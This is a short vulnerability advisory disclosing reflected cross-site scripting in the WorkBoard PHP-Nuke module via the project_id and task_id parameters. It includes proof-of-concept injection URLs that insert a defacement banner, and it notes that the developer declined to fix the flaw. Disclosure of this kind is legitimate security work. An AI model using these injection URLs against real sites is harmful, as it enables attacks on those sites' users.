#########################################
Work board input validation error in
task_id variable and proyect_id variable
let´s remote users to make XSS attacks
vendor: http://www.burnwave.com/modules.php? name=
Archives&op=info&did=15

Developer: Michael Squires
vendor notified: yes(msn conversation) xploit include: yes
original advisore:http://lostmon.blogspot.com
##########################################


WorkBoard is a project/task manager used for primarily for software development
(in this case, PHP... but it can be used for non-software projects).
this script have two imput validation erros and a remote user can conduct
Cross-site scripting attacks (XSS)

the flaw was on 'project_id' variable

http://[target]/modules.php?name=WorkBoard&file=
project&project_id=3[XSS_code]

http://[target]/modules.php?name=WorkBoard&file=project&project_id=
2%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+XSS%20Pow@!!+%21%21%21+
lostmon+was+here+%3AD%3C/h1%3E

and the same flaw afected 'task_id' variable

http://[target]/modules.php?name=Work_Board&op=
Task&task_id=7[XSS_code]
http://[target]/modules.php?name=Work_Board&op=
Task&task_id=5%3Cbody%3E%3Cp%3E%3Ch1%3EWorkboard+
XSS%20Pow@!!+%21%21%21+lostmon+was+here+%3AD%3C/h1%3E

i`m speaking whith the developer by msn conversation....
but he is no interesed to fix it ????
:///

atentamente

Lostmon (lostmon@gmail.com)

thnx to estrella to be my ligth

thnx to all who belibed in me